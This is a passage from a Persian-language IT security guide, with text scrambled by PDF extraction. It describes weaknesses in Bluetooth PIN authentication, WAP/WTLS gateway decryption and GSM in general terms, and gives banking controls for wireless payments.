ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﺍﻳﻤﻨﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘـﺖ ﺗﻘﻠﺒـﻲ ﺍﺳـﺖ
ﻭﺍﺭﺩ ﻛﻨﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻠﻔﻨﻬﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ GPRSﺩﺍﺭﻧـﺪ ﺍﺯ
ﻗﺎﺑﻠﻴﺖ bluetoothﻧﻴﺰ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﻫـﺮ ﺩﺳـﺘﮕﺎﻩ ﺑـﺎ ﻗﺎﺑﻠﻴـﺖ
bluetoothﺷﺎﻣﻞ ﻳﻚ ﺁﺩﺭﺱ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪ
ﻛﺎﺭﺑﺮ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﺑﻪ ﻧﻮﻋﻲ ﺑﻪ ﺷﺨﺼﻲ ﻛﻪ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ
ﺍﺭﺗﺒﺎﻁ ﺍﺳﺖ ﻧﻮﻋﻲ ﺍﻋﺘﻤﺎﺩ ﭘﻴﺪﺍ ﻛﻨﺪ .ﻫﻤﻴﻨﻜـﻪ ﺍﻳـﻦ ﺷﻨﺎﺳـﻪ ﺑـﻪ
ﻳﻚ ﻛﺎﺭﺑﺮ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪ ،ﺑﺎ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﻭ ﺑﺮﺭﺳـﻲ
ﺷﻨﺎﺳﺔ ﺁﻧﻬـﺎ ﻣـﻲ ﺗـﻮﺍﻥ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺿـﺒﻂ ﻧﻤـﻮﺩ .ﺩﺭ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ bluetoothﺑﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ،ﻳـﻚ
ﻓﺮﺁﻳﻨﺪ ﻣﻘﺪﺍﺭﺩﻫﻲ ﺍﻭﻟﻴﻪ ﺁﻏﺎﺯ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺍﺯ ﻳﻚ PINﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ .ﺍﮔﺮﭼﻪ ﺑﺮﺧـﻲ ﺍﺑﺰﺍﺭﻫـﺎ ﺑـﻪ ﺷـﻤﺎ
ﺍﺟﺎﺯﻩ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺷﻤﺎﺭﺓ PINﺭﺍ ﻣﻲﺩﻫﻨﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻥ PINﺭﺍ
ﺩﺭ ﺣﺎﻓﻈﺔ ﻳﻚ ﺩﺳـﺘﮕﺎﻩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﺎ ﺩﻳـﺴﻚ ﺳـﺨﺖ ﻧﻴـﺰ
ﺫﺧﻴﺮﻩ ﻧﻤﻮﺩ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﮕﺎﻩ ﺗﺄﻣﻴﻦ ﻧﺒﺎﺷـﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻣـﺸﻜﻼﺕ ﻋﺪﻳـﺪﻩﺍﻱ ﺑـﻪ ﺑـﺎﺭ ﺑﻴﺎﻳﻨـﺪ .ﻫﻤﭽﻨـﻴﻦ
ﺭﻣﺰﻫﺎﻱ ﻏﺎﻟﺐ PINﻫﺎ ﺍﻋﺪﺍﺩ ﭼﻬﺎﺭ ﺭﻗﻤﻲ ﻫـﺴﺘﻨﺪ ،ﻭ ﺷـﺎﻳﺪ ﺩﺭ
ﻧﻴﻤﻲ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﻋﺪﺩ 0000ﺑﺎﺷﺪ.
ﺍﻣﻨﻴــﺖ bluetoothﺩﺭ ﮔــﺮﻭ ﻧﮕﻬــﺪﺍﺭﻱ ﺍﺯ ﻛﻠﻴــﺪ ﺭﻣﺰﻧﮕــﺎﺭﻱ
ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺍﺯ ﻣﺸﺘﺮﻙ ﻣﻴﺎﻥ ﺍﻋﻀﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺖ .ﺍﻣﺎ ﺗـﺼﻮﺭ
ﻛﻨﻴــﺪ ﻣــﻦ ﻭ ﺷــﻤﺎ ﺑــﺎ ﺗﻠﻔﻨﻬــﺎﻱ ﻫﻤــﺮﺍﻩ ﺧــﻮﺩ ﻛــﻪ ﻗﺎﺑﻠﻴــﺖ
bluetoothﺩﺍﺭﻧﺪ ﺩﺭﺣـﺎﻝ ﻣﻜﺎﻟﻤـﻪ ﻫـﺴﺘﻴﻢ .ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ
ﺍﻣﻨﻴﺖ ﻣﻜﺎﻟﻤﻪ ،ﻣﻦ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺷﻤﺎ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻜﺎﻟﻤـﻪ ﺭﺍ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﻛﻨﻢ .ﻛﻤﻲ ﺑﻌـﺪﺗﺮ ﻳﻜـﻲ ﺍﺯ ﺩﻭﺳـﺘﺎﻧﺘﺎﻥ ﺑـﺎ ﺷـﻤﺎ
ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ ﻭ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺍﺯ ﻛﻠﻴﺪ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ.
ﻣﻦ ﻛﻪ ﻛﻠﻴﺪ ﺷﻤﺎ ﺭﺍ ﻣﻲﺩﺍﻧﻢ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺁﺩﺭﺱ ﺟﻌﻠـﻲ
169 General Packet Radio Service
ﺑﺨﺶ ﺳﻮﻡ
١٦٥
ﺑﺮﺭﺳﻲ ﺷﺨﺼﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺑـﺮﺍﻱ ﻳـﻚ ﻗﻄﻌـﻪ ﭘﻴـﺎﻡ ﻗـﺮﺍﺭﺩﺍﺩﻱ
ﺑﻤﻨﻈﻮﺭ ﺗﻀﻤﻴﻦ ﻛﻞ ﭘﻴـﺎﻡ ﻭ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ ﺧـﺪﻣﺎﺕ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ
ﺑﺮﺭﺳﻲ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﺛﺒﺖﺷﺪﺓ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺎﺷﺪ.
١٩٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻲﺗﻮﺍﻧﻢ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻢ ،ﻭ ﺑﻪ ﻣﻜﺎﻟﻤـﺔ ﺷـﻤﺎ
ﮔﻮﺵ ﻛﻨﻢ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻢ ﺧﻮﺩﻡ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺷﻤﺎ ﻳﺎ ﻛـﺴﻲ
ﻛﻪ ﺩﺭﺣﺎﻝ ﻣﻜﺎﻟﻤﻪ ﺑﺎ ﺷﻤﺎ ﺍﺳﺖ ﺟﺎ ﺑﺰﻧﻢ .ﺑﻨﺎﺑﺮﺍﻳﻦ bluetooth
ﺗﻨﻬﺎ ﺍﺑﺰﺍﺭﻫﺎ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ،ﻧﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ.
ﺿﻌﻔﻬﺎﻱ WAP
ﻧﻘﻄﻪﺿﻌﻒ ﻣﺸﺘﺮﻙ ﺗﻤﺎﻡ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﺮﺭﺳﻲ ﺷﺪﻩ -ﺻـﺮﻓﻨﻈﺮ ﺍﺯ
ﻧﻮﻉ ﺷﺒﻜﻪ -ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﭘﺮﻭﺗﻜـﻞ ﻛـﺎﺭﺑﺮﺩ ﺑـﻲﺳـﻴﻢ )(WAP
ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺯﺑـﺎﻥ ﻋﻼﻣﺘﮕـﺬﺍﺭﻱ ﺑـﻲﺳـﻴﻢ ) ١٧١(WMLﻭ ﺯﺑـﺎﻥ
ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﻭﺳﺎﻳﻞ ﺩﺳﺘﻲ ) ١٧٢(HDMLﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺍﺳـﺖ.
ﺗﻮﺳﻌﻪ ﺩﻫﻨﺪﮔﺎﻥ ﺑﺮﺍﻱ ﺭﺍﺣﺖﺗﺮ ﺷﺪﻥ ﻛﺎﺭ ،ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﺗـﻼﺵ
ﻣﻲﻛﻨﻨﺪ ﻃﺮﺍﺣﻲ ﺳﻨﺎﺭﻳﻮﻫﺎ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﻫﻨﮕـﺎﻡ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻠـﺰﻡ ﺑـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩﻥ ﻛﻮﺗـﺎﻫﺘﺮﻳﻦ
ﻼ ﺍﻋﺪﺍﺩﻱ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﺷـﻤﺎﺭﻩ ﻛـﺎﺭﺕ
ﻭﺭﻭﺩﻱ ﻣﻤﻜﻦ ﺑﺎﺷﺪ -ﻣﺜ ﹰ
ﺍﻋﺘﺒﺎﺭﻱ ﻳﺎ ﺷﻤﺎﺭﺓ ﺣﺴﺎﺏ ﺷﺨﺼﻲ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﺑﻪ
ﺁﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﻗـﺴﻤﺖ ﺍﻋﻈـﻢ ﺍﻳـﻦ ﺩﺍﺩﻩﻫـﺎ ﺩﺭﻭﻥ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺫﺧﻴﺮﻩ ﻣﻲﺷـﻮﻧﺪ ،ﻭ ﺩﺭ ﻭﺳـﻴﻠﺔ ﺩﺳـﺘﻲ ﻣﺮﺑﻮﻃـﻪ
ﺗﻨﻬﺎ ﻳﻚ cookieﺣﺎﻭﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ؛ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ
ﺍﻭﻗﺎﺕ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻳﻲ ﻣﺜﺎﻝ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ ﺳـﺮﻣﺎﻳﻪ
ﺻﺮﻓﹰﺎ ﺑﻪ ﻳﻚ PINﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﮔﺎﻫﻲ ﺣﺘﻲ ﺍﺯ ﺁﻥ ﻫـﻢ ﺑـﻲﻧﻴـﺎﺯ
ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺗﺒـﺎﺩﻻﺕ ﻣﻴـﺎﻥ ﺩﺳـﺘﮕﺎﻫﻬﺎ ﺩﺭ
ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺮ ﻋﻬﺪﺓ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﻳﮕﺮﻱ ﺑﻪ ﻧـﺎﻡ ﺍﻣﻨﻴـﺖ ﻻﻳـﺔ
ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳﻴﻢ ) ١٧٣(WTLSﻣﻲﺑﺎﺷﺪ.
١٧٠
ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﻛﻪ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ۱۲۸ ١٧٤SSLﺑﻴﺘـﻲ ﻣﻮﺑﺎﻳـﻞ ﻳـﺎ
ﭘﺮﻭﺗﻜﻞ ) IPSecﻛﻪ ﺑﻴﺸﺘﺮ ﮔﻮﺷﻲﻫﺎ ﺑﺪﻟﻴﻞ ﻛﻤﺒﻮﺩ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻭ ﻗﺪﺭﺕ
ﭘﺮﺩﺍﺯﺵ ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻤﻲﻛﻨﻨﺪ( ﺍﺳﺘﻔﺎﺩﻩ ﻧﺸﻮﺩ ،ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻗﺴﻤﺘﻲ
ﺍﺯ ﺷﺒﻜﻪ ﻳﻚ ﺣﻠﻘﺔ ﺿﻌﻴﻒ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ .ﺣﺘـﻲ ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻧﻴـﺰ ﺿـﻌﻔﻬﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺩﺍﺧﻞ ﻭﺳﻴﻠﻪ )ﻭ ﻧـﻪ ﻛﺎﻧـﺎﻝ ﺍﺭﺗﺒـﺎﻃﻲ( ﻫﻤﭽﻨـﺎﻥ ﻭﺟـﻮﺩ
ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؛ ﻭ ﻟﺬﺍ ﺍﻣﻨﻴﺖ ﺍﺭﺗﺒﺎﻁ ﺑﻪ ﺳـﺎﺩﮔﻲ ﺧﺪﺷـﻪﺩﺍﺭ ﻣـﻲ-
ﺷﻮﺩ GSM .ﺍﺯ WAPﻭ WTLSﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﻌﺎﺩﻝ
SSLﺍﺳﺖ ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺿـﻌﻴﻔﺘﺮWTLS .
ﺑﺎ SSLﻛﻪ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺻﻨﻌﺘﻲ ﺍﺳـﺖ ﺳـﺎﺯﮔﺎﺭ ﻧﻤـﻲﺑﺎﺷـﺪ.
ﭘﻴﺎﻣﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭﻭﻥ ﻳﻚ gatewayﻣﻲﺭﻭﻧﺪ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﻭﺍﺭﺩ
Wireless Application Protocol
Wireless Markup Language
Handled Device Markup Language
Wireless Transport Layer Security
Secure Socket Layer
170
171
172
173
174
ﻳﻚ ﺷﺒﻜﻪ ﺳﻴﻤﻲ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺑـﻪ ﺳـﻤﺖ ﻣﻘـﺼﺪ ﻧﻬـﺎﻳﻲ ﺧـﻮﺩ
ﻫــﺪﺍﻳﺖ ﮔﺮﺩﻧــﺪ .ﺩﺭ ﺁﻥ ،gatewayﭘﻴــﺎﻡ WTLSﺑــﻪ SSL
ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ .ﺩﺭ gatewayﭘﻴﺎﻡ ﺑﺮﺍﻱ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ
ﻣﻲﮔﺮﺩﺩ ﻭ ﻫﻤﻴﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﻛﻞ ﺍﺭﺗﺒﺎﻁ ﻧـﺴﺒﺖ ﺑـﻪ
ﻱ ﭘﻴﺎﻡ ﺁﺳﻴﺐﭘﺬﻳﺮ ﮔﺮﺩﺩ.
ﺩﺯﺩ ﹺ
ﻩ.
ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ GSM
ﻧﻘــﺎﻳﺺ ﺫﺍﺗــﻲ GSMﺑﺮﺍﺣﺘــﻲ ﻗﺎﺑــﻞ ﺭﻓــﻊ ﻧﻴــﺴﺘﻨﺪ .ﺗﻠﻔﻨﻬــﺎ ﻭ
PDAﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻓﻨﺎﻭﺭﻱ GSMﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻋﻤﻮﻣﹰﺎ ﻗﺎﺩﺭ
ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺤﺎﻓﻆ ﻧﻤﻲﺑﺎﺷـﻨﺪ .ﺍﮔﺮﭼـﻪ GSM
ﻣﺜﻞ ﻫﻤﺘﺎﻱ ﺁﻣﺮﻳﻜﺎﻳﻲ ﺧﻮﺩ -ﺍﺳﺘﺎﻧﺪﺍﺭﺩ - 802.11ﻧﺴﺒﺖ ﺑﻪ
war drivingﺁﺳﻴﺐﭘﺬﻳﺮ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﭼﻨﺪ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳـﻲ
ﺩﺍﺭﺩ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩ 802.11ﻣﺮﺑﻮﻁ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ ﻭ ﻧﻪ ﻭﺳـﺎﻳﻞ
ﮔﻮﺷﻲﺩﺍﺭ ،ﻭ ﻟﺬﺍ ﺍﻣﻨﻴﺖ ﺩﺭ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻃﺮﺯ ﻣـﺆﺛﺮﻱ ﻧـﺴﺒﺖ
ﺑﻪ GSMﺑﻬﺒﻮﺩ ﻳﺎﺑﺪ .ﺷﺒﻜﻪ ﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )VPNﻫـﺎ(
ﻓﺼﻞ ﻣﺸﺘﺮﻙ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻳـﻦ ﺩﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻫـﺴﺘﻨﺪ ،ﻭ
ﻻ ﺑﻌﻨــﻮﺍﻥ ﺭﺍﻩﺣﻠــﻲ ﺑــﺮﺍﻱ ﺭﻓــﻊ
ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ VPNﻣﻌﻤــﻮ ﹰ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻌﻠﻲ 802.11ﻭ GSMﺑـﺸﻤﺎﺭ ﻣـﻲﺭﻭﺩ .ﺑـﺎ
ﺍﻳﻨﺤﺎﻝ ﺩﺭ ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﻻﻳﺔ ﺧﺎﺹ ﺍﻧﺘﻈـﺎﺭ
ﻣﻌﺠﺰﻩ ﺩﺍﺷﺖ .ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺑﻲﺳﻴﻢ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﭘﺎﻳﺎﻥ ﻫﻤﻴﻦ ﺑﺨﺶ ﻛﺘﺎﺏ ﻭ ﻧﻴﺰ ﺑﺨـﺶ
ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﻴﺎﺑﻴﺪ.
ﻭ.
ﺗﺠﺎﺭﺏ ﺍﻣﻨﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ
ﺩﺭ ﻧﺘﻴﺠﺔ ﮔﺴﺘﺮﺵ ﻓﺮﺍﻭﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ GSMﺩﺭ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻛﻨﺘﺮﻟـﻲ ﻭ ﺍﻣﻨﻴﺘـﻲ ﭼﻨـﺪﻱ ﺑﻮﺟـﻮﺩ
ﺁﻣﺪﻩﺍﻧﺪ ﻛﻪ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺩﺭﺻـﻮﺭﺕ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ
ﺑﻲﺳﻴﻢ ﺩﺭ ﺧﺪﻣﺎﺕ ﭘﺮﺩﺍﺧﺖ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﭘﺮﺩﺍﺧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺷﺨﺺ ﺛﺎﻟﺚ
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻗﺎﻋﺪﺓ ﻛﻠﻲ ،ﺑﺎﻧﻜﻬﺎ ﺑﺎﻳﺪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﻣﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺭﺍ
ﺩﺭ ﻣﻌﺎﻣﻼﺕ ﻣﺎﻟﻲ ﺑﻲﺳﻴﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻨﺪ .ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺑﻌﻀﻲ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻪ ﺑﺎﻧﻚ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺋﻤﻲ ﺑﺪﻫﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺍﺯ
ﺣﺴﺎﺏ ﺁﻧﻬﺎ ﺍﻋﺘﺒﺎﺭ ﺑﺮﺩﺍﺷﺖ ﻛﻨﺪ ﻭ ﺑﻪ ﺣـﺴﺎﺏ ﺑﺮﺧـﻲ ﺍﺷـﺨﺎﺹ
ﺛﺎﻟــﺚ ﻭﺍﺭﻳــﺰ ﻧﻤﺎﻳــﺪ .ﭼﻨــﻴﻦ ﺗﻮﺍﻓﻘﻬــﺎﻳﻲ ﻣــﻲﺗﻮﺍﻧــﺪ ﺍﺯ ﻃﺮﻳــﻖ
ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﺣﺴﺎﺑﺮﺳﻲ ﻣـﺴﺘﻘﻴﻢ ١٧٥ﺻـﻮﺭﺕ
175 Direct Debit Authorization Agreements
١٩٣
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﮕﻴﺮﺩ .ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺩﺭﺻـﻮﺭﺕ ﻋﻤـﻞ ﺑـﻪ ﺍﻳـﻦ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﻪﻫـﺎ،
ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻣﺸﺘﺮﻳﺎﻥ )IDﻫـﺎ
ﻭ PINﻫﺎ( ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻳﺎ ﺁﻧﻬﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻨﺪ.
•
ﺑﻪ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺗﻮﺻﻴﻪ ﺷﻮﺩ ﻛﻪ ﺑﺮﺍﻱ ﺧـﺪﻣﺎﺕ ﻣﺨﺘﻠـﻒ
ﺍﺯ PINﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ.
•
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﭘﺮﺩﺍﺧـﺖ
ﺳﻴﺎﺭ ﺑﺎﻳﺪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ
ﺳﻴﺎﺭ ﺑﻪ ﻣﺸﺘﺮﻱ ﺩﺍﺩﻩ ﺷﻮﺩ.
•
ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺩﺭ ﻣﻮﺭﺩ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻣﺸﺎﺟﺮﺍﺕ ،ﺭﻭﺍﻟﻬـﺎﻱ
ﮔﺰﺍﺭﺵﺩﻫﻲ ﻭ ﺯﻣﺎﻥ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺭﻓﻊ ﻭ ﺭﺟﻮﻉ ﺷـﻜﺎﻳﺎﺕ
ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻱ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ.
ﺣﺴﺎﺑﻬﺎﻱ ﺫﺧﻴﺮﻩ
ﺣﺴﺎﺑﻬﺎﻱ ﺫﺧﻴﺮﻩ ) ١٧٦(SVAﺗﻮﺳﻂ ﻣﺸﺘﺮﻳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷـﻮﺩ
ﻛﻪ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩ ﺍﻱ ﺑﻪ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎ ﭘﻮﻝ ﻭﺍﺭﻳﺰ ﻣﻲﻛﻨﻨﺪSVA .
ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺳـﻴﺎﺭ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ .ﻫﻨﮕـﺎﻡ ﺍﻧﺠـﺎﻡ
ﻋﻤﻠﻴﺎﺕ ﭘﺮﺩﺍﺧﺖ ،ﻫﻴﭻ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻧﺒﺎﻳﺪ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ
ﮔﻴﺮﺩ .ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻋﺘﺒﺎﺭ ﺍﺯ ﻳﻚ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑﻪ ﻳﻚ ﺣـﺴﺎﺏ
